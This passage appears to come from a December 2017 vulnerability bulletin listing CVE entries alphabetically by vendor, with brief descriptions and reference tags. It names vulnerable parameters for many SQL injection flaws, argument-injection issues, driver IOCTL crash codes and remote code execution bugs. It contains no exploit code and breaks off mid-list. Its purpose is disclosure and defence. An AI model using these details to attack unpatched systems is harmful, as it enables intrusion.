batteriesConfig.mlp in OCaml Batteries Included (aka ocaml-batteries) 2.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17519
MISC
octopus -- octopus_deploy
 
In Octopus Deploy before 4.1.3, the machine update process doesn't check that the user has access to all environments. This allows an access-control bypass because the set of environments to which a machine is scoped may include environments in which the user lacks access.2017-12-13not yet calculatedCVE-2017-17665
CONFIRM
openstack -- openstack
 
A resource-permission flaw was found in the openstack-tripleo-heat-templates package where ceph.client.openstack.keyring is created as world-readable. A local attacker with access to the key could read or modify data on Ceph cluster pools for OpenStack as though the attacker were the OpenStack service, thus potentially reading or modifying data in an OpenStack Block Storage volume.2017-12-12not yet calculatedCVE-2017-12155
CONFIRM
CONFIRM
palo_alto_networks -- globalprotect_agent
 
Palo Alto Networks GlobalProtect Agent before 4.0.3 allows attackers with administration rights on the local station to gain SYSTEM privileges via vectors involving "image path execution hijacking."2017-12-11not yet calculatedCVE-2017-15870
BID
CONFIRM
palo_alto_networks -- pan-os
 
The configuration file import for applications, spyware and vulnerability objects functionality in the web interface in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, and 7.1.x before 7.1.14 allows remote attackers to conduct server-side request forgery (SSRF) attacks and consequently obtain sensitive information via vectors related to parsing of external entities.2017-12-11not yet calculatedCVE-2017-15943
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.13, and 8.0.x before 8.0.6 allows remote attackers to cause a denial of service via vectors related to the management interface.2017-12-11not yet calculatedCVE-2017-15942
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
The web interface packet capture management component in Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote authenticated users to execute arbitrary code via unspecified vectors.2017-12-11not yet calculatedCVE-2017-15940
BID
SECTRACK
CONFIRM
palo_alto_networks -- pan-os
 
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.2017-12-11not yet calculatedCVE-2017-15944
BID
SECTRACK
CONFIRM
panda_security -- panda_global_protection
 
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c04 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17684
MISC
panda_security -- panda_global_protection
 
Panda Global Protection 17.0.1 allows a system crash via a 0xb3702c44 \\.\PSMEMDriver DeviceIoControl request.2017-12-14not yet calculatedCVE-2017-17683
MISC
pandora -- ios_app
 
Pandora iOS app prior to version 8.3.2 fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3194
BID
MISC
CERT-VN
MISC
pasdoc -- pasdoc
 
** DISPUTED ** delphi_gui/WWWBrowserRunnerDM.pas in PasDoc 0.14 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a software maintainer has indicated that the code referencing the BROWSER environment variable is never used.2017-12-14not yet calculatedCVE-2017-17527
MISC
pcausa -- rawether_framework
 
PCAUSA Rawether framework does not properly validate BPF data, allowing a crafted malicious BPF program to perform operations on memory outside of its typical bounds on the driver's receipt of network packets. Local attackers can exploit this issue to execute arbitrary code with SYSTEM privileges.2017-12-15not yet calculatedCVE-2017-3196
MISC
BID
MISC
CERT-VN
phabricator -- phabricator
 
Phabricator before 2017-11-10 does not block the --config and --debugger flags to the Mercurial hg program, which allows remote attackers to execute arbitrary code by using the web UI to browse a branch whose name begins with a --config= or --debugger= substring.2017-12-11not yet calculatedCVE-2017-17536
MISC
MISC
phoenix_contact -- fl_comserver
 
A Cross-site Scripting issue was discovered in PHOENIX CONTACT FL COMSERVER BASIC 232/422/485, FL COMSERVER UNI 232/422/485, FL COMSERVER BAS 232/422/485-T, FL COMSERVER UNI 232/422/485-T, FL COM SERVER RS232, FL COM SERVER RS485, and PSI-MODEM/ETH (running firmware versions prior to 1.99, 2.20, or 2.40). The cross-site scripting vulnerability has been identified, which may allow remote code execution.2017-12-11not yet calculatedCVE-2017-16723
BID
MISC
MISC
phpscriptsmall.com -- advance_b2b_script
 
Advance B2B Script 2.1.3 has SQL Injection via the tradeshow-list-detail.php show_id or view-product.php pid parameter.2017-12-13not yet calculatedCVE-2017-17602
MISC
phpscriptsmall.com -- advance_online_learning_managment_script
 
Advance Online Learning Management Script 3.1 has SQL Injection via the courselist.php subcatid or popcourseid parameter.2017-12-13not yet calculatedCVE-2017-17599
MISC
phpscriptsmall.com -- advanced_real_estate_script
 
Advanced Real Estate Script 4.0.7 has SQL Injection via the search-results.php Projectmain, proj_type, searchtext, sell_price, or maxprice parameter.2017-12-13not yet calculatedCVE-2017-17603
MISC
phpscriptsmall.com -- advanced_world_database
 
Advanced World Database 2.0.5 has SQL Injection via the city.php country or state parameter, or the state.php country parameter.2017-12-13not yet calculatedCVE-2017-17640
MISC
phpscriptsmall.com -- affiliate_mlm_script
 
Affiliate MLM Script 1.0 has SQL Injection via the product-category.php key parameter.2017-12-13not yet calculatedCVE-2017-17598
MISC
phpscriptsmall.com -- basic_b2b_script
 
Basic B2B Script 2.0.8 has SQL Injection via the product_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17600
MISC
phpscriptsmall.com -- beauty_parlour_booking_script
 
Beauty Parlour Booking Script 1.0 has SQL Injection via the /list gender or city parameter.2017-12-13not yet calculatedCVE-2017-17595
MISC
phpscriptsmall.com -- cab_booking_script
 
Cab Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17601
MISC
phpscriptsmall.com -- car_rental_script
 
Car Rental Script 2.0.4 has SQL Injection via the countrycode1.php val parameter.2017-12-13not yet calculatedCVE-2017-17637
MISC
phpscriptsmall.com -- chartered_accountant_booking_script
 
Chartered Accountant Booking Script 1.0 has SQL Injection via the /service-list city parameter.2017-12-13not yet calculatedCVE-2017-17609
MISC
phpscriptsmall.com -- child_care_script
 
Child Care Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17608
MISC
phpscriptsmall.com -- cms_auditor_website
 
CMS Auditor Website 1.0 has SQL Injection via the PATH_INFO to /news-detail.2017-12-13not yet calculatedCVE-2017-17607
MISC
phpscriptsmall.com -- co-work_space_search_script
 
Co-work Space Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17606
MISC
phpscriptsmall.com -- consumer_complaints_clone_script
 
Consumer Complaints Clone Script 1.0 has SQL Injection via the other-user-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17605
MISC
phpscriptsmall.com -- doctor_search_script

 
Doctor Search Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17611
MISC
phpscriptsmall.com -- domainsale_php_script
 
DomainSale PHP Script 1.0 has SQL Injection via the domain.php id parameter.2017-12-13not yet calculatedCVE-2017-17594
MISC
phpscriptsmall.com -- e-commerce_mlm_software

 
E-commerce MLM Software 1.0 has SQL Injection via the service_detail.php pid parameter, event_detail.php eventid parameter, or news_detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17610
MISC
phpscriptsmall.com -- entrepreneur_bus_booking_script
 
Entrepreneur Bus Booking Script 3.0.4 has SQL Injection via the booker_details.php sourcebus parameter.2017-12-13not yet calculatedCVE-2017-17604
MISC
phpscriptsmall.com -- entrepreneur_dating_script
 
Entrepreneur Dating Script 2.0.1 has SQL Injection via the search_result.php marital, gender, country, or profileid parameter.2017-12-13not yet calculatedCVE-2017-17648
EXPLOIT-DB
phpscriptsmall.com -- entrepreneur_job_portal_script
 
Entrepreneur Job Portal Script 2.0.6 has SQL Injection via the jobsearch_all.php rid1 parameter.2017-12-13not yet calculatedCVE-2017-17596
MISC
phpscriptsmall.com -- event_search_script
 
Event Search Script 1.0 has SQL Injection via the /event-list city parameter.2017-12-13not yet calculatedCVE-2017-17616
MISC

phpscriptsmall.com -- facebook_clone_script


 
Facebook Clone Script 1.0 has SQL Injection via the friend-profile.php id parameter.2017-12-13not yet calculatedCVE-2017-17615
MISC
phpscriptsmall.com -- food_order_script

 
Food Order Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17614
MISC
phpscriptsmall.com -- foodspotting_clone_script
 
Foodspotting Clone Script 1.0 has SQL Injection via the quicksearch.php q parameter.2017-12-13not yet calculatedCVE-2017-17617
MISC
phpscriptsmall.com -- freelance_website_script

 
Freelance Website Script 2.0.6 has SQL Injection via the jobdetails.php pr_id parameter or the searchbycat_list.php catid parameter.2017-12-13not yet calculatedCVE-2017-17613
MISC
phpscriptsmall.com -- groupon_clone_script
 
Groupon Clone Script 3.01 has SQL Injection via the city_ajax.php state_id parameter.2017-12-13not yet calculatedCVE-2017-17638
MISC
phpscriptsmall.com -- hot_scripts_clone
 
Hot Scripts Clone 3.1 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17612
MISC
phpscriptsmall.com -- kickstarter_clone_script
 
Kickstarter Clone Script 2.0 has SQL Injection via the investcalc.php projid parameter.2017-12-13not yet calculatedCVE-2017-17618
MISC
phpscriptsmall.com -- laundry_booking_script
 
Laundry Booking Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17619
MISC
MISC
phpscriptsmall.com -- lawyer_search_script
 
Lawyer Search Script 1.1 has SQL Injection via the /lawyer-list city parameter.2017-12-13not yet calculatedCVE-2017-17620
MISC
phpscriptsmall.com -- mlm_forced_matrix
 
MLM Forced Matrix 2.0.9 has SQL Injection via the news-detail.php newid parameter.2017-12-13not yet calculatedCVE-2017-17636
MISC
phpscriptsmall.com -- mlm_forex_market_plan_script
 
MLM Forex Market Plan Script 2.0.4 has SQL Injection via the news_detail.php newid parameter or the event_detail.php eventid parameter.2017-12-13not yet calculatedCVE-2017-17635
MISC
phpscriptsmall.com -- multiplex_movie_theater_booking_script
 
Multiplex Movie Theater Booking Script 3.1.5 has SQL Injection via the trailer-detail.php moid parameter, show-time.php moid parameter, or event-detail.php eid parameter.2017-12-13not yet calculatedCVE-2017-17633
MISC
phpscriptsmall.com -- multireligion_responsive_matrimonial
 
Multireligion Responsive Matrimonial 4.7.2 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17631
MISC
phpscriptsmall.com -- multivendor_penny_auction_clone_script
 
Multivendor Penny Auction Clone Script 1.0 has SQL Injection via the PATH_INFO to the /detail URI.2017-12-13not yet calculatedCVE-2017-17621
MISC
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
Muslim Matrimonial Script 3.02 has SQL Injection via the success-story.php succid parameter.2017-12-13not yet calculatedCVE-2017-17639
MISC
phpscriptsmall.com -- nearbuy_clone_script
 
Nearbuy Clone Script 3.2 has SQL Injection via the category_list.php search parameter.2017-12-13not yet calculatedCVE-2017-17597
MISC
phpscriptsmall.com -- online_exam_test_application_script
 
Online Exam Test Application Script 1.6 has SQL Injection via the exams.php sort parameter.2017-12-13not yet calculatedCVE-2017-17622
MISC
MISC
phpscriptsmall.com -- opensource_classified_ads_script

 
Opensource Classified Ads Script 3.2 has SQL Injection via the advance_result.php keyword parameter.2017-12-13not yet calculatedCVE-2017-17623
MISC
phpscriptsmall.com -- php_multivendor_ecommerce
 
PHP Multivendor Ecommerce 1.0 has SQL Injection via the single_detail.php sid parameter, or the category.php searchcat or chid1 parameter.2017-12-13not yet calculatedCVE-2017-17624
MISC
phpscriptsmall.com -- professional_service_script
 
Professional Service Script 1.0 has SQL Injection via the service-list city parameter.2017-12-13not yet calculatedCVE-2017-17625
MISC
phpscriptsmall.com -- readymade_php_classified_script
 
Readymade PHP Classified Script 3.3 has SQL Injection via the /categories subctid or mctid parameter.2017-12-13not yet calculatedCVE-2017-17626
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script 3.2 has SQL Injection via the single-video-detail.php report_videos array parameter.2017-12-13not yet calculatedCVE-2017-17627
MISC
phpscriptsmall.com -- responsive_events_and_movie_ticket_booking_scriptResponsive Events And Movie Ticket Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17632
MISC
phpscriptsmall.com -- responsive_realestate_script
 
Responsive Realestate Script 3.2 has SQL Injection via the property-list tbud parameter.2017-12-13not yet calculatedCVE-2017-17628
MISC
phpscriptsmall.com -- resume_clone_script
 
Resume Clone Script 2.0.5 has SQL Injection via the preview.php id parameter.2017-12-13not yet calculatedCVE-2017-17641
MISC
phpscriptsmall.com -- secure_e-commerce_script
 
Secure E-commerce Script 2.0.1 has SQL Injection via the category.php searchmain or searchcat parameter, or the single_detail.php sid parameter.2017-12-13not yet calculatedCVE-2017-17629
MISC
phpscriptsmall.com -- single_theater_booking_script
 
Single Theater Booking Script 3.2.1 has SQL Injection via the findcity.php q parameter.2017-12-13not yet calculatedCVE-2017-17634
MISC
phpscriptsmall.com -- yoga_class_script
 
Yoga Class Script 1.0 has SQL Injection via the /list city parameter.2017-12-13not yet calculatedCVE-2017-17630
MISC
phusion_passenger -- phusion_passenger
 
In agent/Core/SpawningKit/Spawner.h in Phusion Passenger 5.1.10 (fixed in Passenger Open Source 5.1.11 and Passenger Enterprise 5.1.10), if Passenger is running as root, it is possible to list the contents of arbitrary files on a system by symlinking a file named REVISION from the application root folder to a file of choice and querying passenger-status --show=xml.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-16355
Source & Patch Info: CONFIRM, CONFIRM

posty -- readymade_classifieds_script
Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17111
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has SQL Injection via the admin/user_activate_submit.php ID parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17567
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has XSS via the admin/user_activate_submit.php ID parameter.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17569
Source & Patch Info: MISC

posty -- scubez_posty_readymade_classifieds
Scubez Posty Readymade Classifieds has Incorrect Access Control for visiting admin/user_activate_submit.php (aka the backend PHP script), which might allow remote attackers to obtain sensitive information via a direct request.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17568
Source & Patch Info: MISC

ppm_2000 -- perspective_icm
Perspective ICM Investigation & Case 5.1.1.16 allows remote authenticated users to modify access level permissions and consequently gain privileges by leveraging insufficient validation methods and missing cross server side checking mechanisms.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-11319
Source & Patch Info: MISC

puppet -- puppet_enterprise
Cross-site scripting (XSS) vulnerability in the console in Puppet Enterprise before 2015.2.1 allows remote attackers to inject arbitrary web script or HTML via the string parameter, related to Login Redirect.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2015-6502
Source & Patch Info: CONFIRM

puppet -- puppet_enterprise
The console in Puppet Enterprise 3.7.x, 3.8.x, and 2015.2.x does not set the secure flag for the JSESSIONID cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2015-8470
Source & Patch Info: CONFIRM

puppet -- puppetlabs-apache
The default vhost configuration file in Puppet before 3.6.2 does not include the SSLCARevocationCheck directive, which might allow remote attackers to obtain sensitive information via a revoked certificate when a Puppet master runs with Apache 2.4.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2014-3250
Source & Patch Info: CONFIRM, CONFIRM

python -- python
Lib/webbrowser.py in Python through 3.6.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17522
Source & Patch Info: MISC

qnap -- qsync_for_windows
A DLL Hijacking vulnerability in QNAP Qsync for Windows (exe) version 4.2.2.0724 and earlier could allow remote attackers to execute arbitrary code on Windows machines.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-13070
Source & Patch Info: CONFIRM

qt_company -- qt_for_android
A vulnerability in applications created using Qt for Android prior to 5.9.3 allows attackers to alter environment variables via unspecified vectors.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-10905
Source & Patch Info: CONFIRM, JVN

qt_company -- qt_for_android
Qt for Android prior to 5.9.0 allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-10904
Source & Patch Info: CONFIRM, JVN

radware -- alteon_devices
Radware Alteon devices with a firmware version between 31.0.0.0-31.0.3.0 are vulnerable to an adaptive-chosen ciphertext attack ("Bleichenbacher attack"). This allows an attacker to decrypt observed traffic that has been encrypted with the RSA cipher and to perform other private key operations.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-17427
Source & Patch Info: BID, MISC, CONFIRM, CERT-VN

rapid7 -- nexpose
Versions of Nexpose prior to 6.4.66 fail to adequately validate the source of HTTP requests intended for the Automated Actions administrative web application, and are susceptible to a cross-site request forgery (CSRF) attack.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-5264
Source & Patch Info: CONFIRM

reddit -- reddit_terminal_viewer
scripts/inspect_webbrowser.py in Reddit Terminal Viewer (RTV) 1.19.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17516
Source & Patch Info: MISC

ruby -- ruby
Ruby before 2.4.3 allows Net::FTP command injection. Net::FTP#get, getbinaryfile, gettextfile, put, putbinaryfile, and puttextfile use Kernel#open to open a local file. If the localfile argument starts with the "|" pipe character, the command following the pipe character is executed. The default value of localfile is File.basename(remotefile), so malicious FTP servers could cause arbitrary command execution.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17405
Source & Patch Info: CONFIRM, CONFIRM

sap -- business_intelligence_promotion_management_application
Cross-Site Scripting (XSS) vulnerability in SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, 4.30, as user controlled inputs are not sufficiently encoded.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16681
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- business_intelligence_promotion_management_application
SAP Business Intelligence Promotion Management Application, Enterprise 4.10, 4.20, and 4.30, does not perform authentication checks for functionalities that require user identity.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16684
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- business_objects_platform
Denial of Service (DOS) in SAP Business Objects Platform, Enterprise 4.10 and 4.20, that could allow an attacker to prevent legitimate users from accessing a service.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16683
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- business_warehouse_universal_data_integration
Cross-Site scripting (XSS) in SAP Business Warehouse Universal Data Integration, from 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50, due to insufficient encoding of user controlled inputs.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16685
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- hana
The user self-service tools of SAP HANA extended application services, classic user self-service, a part of SAP HANA Database versions 1.00 and 2.00, can be misused to enumerate valid and invalid user accounts. An unauthenticated user could use the error messages to determine if a given username is valid.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16687
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- hana
Two potential audit log injections in SAP HANA extended application services 1.0, advanced model: 1) Certain HTTP/REST endpoints of controller service are missing user input validation which could allow unprivileged attackers to forge audit log lines. Hence the interpretation of audit log files could be hindered or misdirected. 2) User Account and Authentication writes audit logs into syslog and additionally writes the same audit entries into a log file. Entries in the log file miss escaping. Hence the interpretation of audit log files could be hindered or misdirected, while the entries in syslog are correct.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16680
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- kernel
A Trusted RFC connection in SAP KERNEL 32NUC, SAP KERNEL 32Unicode, SAP KERNEL 64NUC, SAP KERNEL 64Unicode 7.21, 7.21EXT, 7.22, 7.22EXT; SAP KERNEL from 7.21 to 7.22, 7.45, 7.49, can be established to a different client or a different user on the same system, although no explicit Trusted/Trusting Relation to the same system has been defined.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16689
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- netweaver_internet_transaction_server
SAP NetWeaver Internet Transaction Server (ITS), SAP Basis from 7.00 to 7.02, 7.30, 7.31, 7.40, from 7.50 to 7.52, allows an attacker with administrator credentials to inject code that can be executed by the application and thereby control the behavior of the application.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16682
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- netweaver_knowledge_management_configuration_service
Server Side Request Forgery (SSRF) vulnerability in SAP NetWeaver Knowledge Management Configuration Service, EPBC and EPBC2 from 7.00 to 7.02; KMC-BC 7.30, 7.31, 7.40 and 7.50, that allows an attacker to manipulate the vulnerable application to send crafted requests on behalf of the application.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16678
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- note_assistant_tool
SAP Note Assistant tool (SAP BASIS from 7.00 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.52) supports upload of digitally signed note file of type 'SAR'. The digital signature verification is done together with the extraction of note file contained in the SAR archive. It is possible to append a tampered file to the SAR archive using SAPCAR tool and during the extraction, digital signature verification fails but the tampered file is extracted.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16691
Source & Patch Info: CONFIRM, CONFIRM

sap -- plant_connectivity
A malicious DLL preload attack is possible on NwSapSetup and the Installation self-extracting program for SAP Plant Connectivity 2.3 and 15.0. It is possible that SAPSetup / NwSapSetup.exe loads system DLLs like DWMAPI.dll (located in your Syswow64 / System32 folder) from the folder the executable is in and not from the system location. The desired behavior is that system dlls are only loaded from the system folders. If a dll with the same name as the system dll is located in the same folder as the executable, this dll is loaded and code is executed.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16690
Source & Patch Info: BID, CONFIRM, CONFIRM

sap -- startup_service
URL redirection vulnerability in SAP's Startup Service, SAP KERNEL 32 NUC, SAP KERNEL 32 Unicode, SAP KERNEL 64 NUC, SAP KERNEL 64 Unicode 7.21, 7.21EXT, 7.22 and 7.22EXT; SAP KERNEL 7.21, 7.22, 7.45, 7.49 and 7.52, that allows an attacker to redirect users to a malicious site.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-16679
Source & Patch Info: BID, CONFIRM, CONFIRM

scummvm -- scummvm
backends/platform/sdl/posix/posix.cpp in ScummVM 1.9.0 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17528
Source & Patch Info: MISC

seacms -- seacms
SeaCMS 6.56 allows remote authenticated administrators to execute arbitrary PHP code via a crafted token field to admin/admin_ping.php, which interacts with data/admin/ping.php.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-17561
Source & Patch Info: MISC, MISC

sensible-utils -- sensible-utils
sensible-browser in sensible-utils before 0.0.11 does not validate strings before launching the program specified by the BROWSER environment variable, which allows remote attackers to conduct argument-injection attacks via a crafted URL, as demonstrated by a --proxy-pac-file argument.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17512
Source & Patch Info: MISC, MISC

sinology -- mailplus_server
Cross-site scripting (XSS) vulnerability in Disclaimer in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary web script or HTML via the NAME parameter.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-15890
Source & Patch Info: CONFIRM

swi-prolog -- swi-prolog
library/www_browser.pl in SWI-Prolog 7.2.3 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17524
Source & Patch Info: MISC

sylpheed -- sylpheed
libsylph/utils.c in Sylpheed through 3.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17517
Source & Patch Info: MISC

symantec -- norton_family_android_app
Prior to 4.4.1.10, the Norton Family Android App can be susceptible to an Information Disclosure issue. Information disclosure is a very common issue that attackers will attempt to exploit as a first pass across the application. As they probe the application they will take note of anything that may seem out of place or any bit of information they can use to their advantage such as error messages, system information, user data, version numbers, component names, URL paths, or even simple typos and misspellings.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-15530
Source & Patch Info: BID, CONFIRM

symantec -- norton_family_android_app
Prior to 4.4.1.10, the Norton Family Android App can be susceptible to a Denial of Service (DoS) exploit. A DoS attack is a type of attack whereby the perpetrator attempts to make a particular device unavailable to its intended user by temporarily or indefinitely disrupting services of a specific host within a network.
Published: 2017-12-13 | CVSS Score: not yet calculated | CVE-2017-15529
Source & Patch Info: BID, CONFIRM

synaptics -- touchpad_drivers
A debug tool in Synaptics TouchPad drivers allows local users with administrative access to obtain sensitive information about keyboard scan codes by modifying registry keys.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17556
Source & Patch Info: HP, CONFIRM, MISC

techno -- portfolio_management_panel
Techno Portfolio Management Panel 1.0 allows an attacker to inject SQL commands via a single.php?id= request.
Published: 2017-12-11 | CVSS Score: not yet calculated | CVE-2017-17110
Source & Patch Info: MISC

techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows SQL Injection via the panel/search.php s parameter.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17695
Source & Patch Info: MISC

techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows full path disclosure via an invalid s parameter to panel/search.php.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17696
Source & Patch Info: MISC

techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 allows XSS via the panel/search.php s parameter.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17694
Source & Patch Info: MISC

techno -- portfolio_management_panel
Techno - Portfolio Management Panel through 2017-11-16 does not check authorization for panel/portfolio.php?action=delete requests that remove feedback.
Published: 2017-12-15 | CVSS Score: not yet calculated | CVE-2017-17693
Source & Patch Info: MISC

telegram -- telegram_messenger
The saveFile method in MediaController.java in the Telegram Messenger application before 2017-12-08 for Android allows directory traversal via a pathname obtained in a file-transfer request from a remote peer, as demonstrated by writing to tgnet.dat or tgnet.dat.bak.
Published: 2017-12-16 | CVSS Score: not yet calculated | CVE-2017-17715
Source & Patch Info: MISC

tex_live -- tex_live
TeX Live through 20170524 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, related to linked_scripts/context/stubs/unix/mtxrun, texmf-dist/scripts/context/stubs/mswin/mtxrun.lua, and texmf-dist/tex/luatex/lualibs/lualibs-os.lua.
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17513
Source & Patch Info: MISC

tibbr -- tibbr_community_and_tibbr_enterprise
The tibbr web server components of tibbr Community, and tibbr Enterprise contain SAML protocol handling errors which may allow authorized users to impersonate other users, and therefore escalate their access privileges. Affected releases are tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-5530
Source & Patch Info: CONFIRM

tibbr -- tibbr_community_and_tibbr_enterprise
The tibbr user profiles components of tibbr Community, and tibbr Enterprise expose a weakness in an improperly sandboxed third-party component. Affected releases are TIBCO Software Inc. tibbr Community 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0, tibbr Enterprise 5.2.1 and below; 6.0.0; 6.0.1; 7.0.0.
Published: 2017-12-12 | CVSS Score: not yet calculated | CVE-2017-5534
Source & Patch Info: CONFIRM

tibco -- businessworks_process_monitor
Cross-site scripting (XSS) vulnerability in Integration Matters nJAMS 3, as used in TIBCO BusinessWorks Process Monitor through 3.0.1.3 and other products, allows remote authenticated administrators to inject arbitrary web script or HTML via the users management panel of the web interface.
Published: 2017-12-10 | CVSS Score: not yet calculated | CVE-2017-16789
Source & Patch Info: MISC

tidy -- tidy
In Tidy 5.7.0, the prvTidyTidyMetaCharset function in clean.c allows attackers to cause a denial of service (Segmentation Fault), because the currentNode variable in the "children of the head" processing feature is modified in the loop without validating the new value.
Published: 2017-12-10 | CVSS Score: not yet calculated | CVE-2017-17497
Source & Patch Info: CONFIRM

tin -- tin
** DISPUTED ** tools/url_handler.pl in TIN 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL. NOTE: a third party has reported that this is intentional behavior, because the documentation states "url_handler.pl was designed to work together with tin which only issues shell escaped absolute URLs."
Published: 2017-12-14 | CVSS Score: not yet calculated | CVE-2017-17520
Source & Patch Info: MISC

tkabber -- tkabber
